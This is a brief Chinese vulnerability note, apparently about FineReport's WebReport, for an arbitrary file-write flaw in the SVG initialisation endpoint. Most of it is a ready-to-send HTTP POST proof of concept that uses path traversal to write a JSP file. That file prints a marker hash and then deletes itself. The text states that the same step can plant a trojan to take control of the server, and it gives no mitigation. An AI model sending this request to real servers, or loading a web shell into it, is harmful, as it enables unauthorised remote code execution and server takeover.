漏洞描述
由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限。
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/heawvb.svg.jsp HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 171
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko
{"__CONTENT__":"<%out.println(\"227d4799c34cd32cd4d1316f249deb50\");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>","__CHARSET__":"UTF-8"}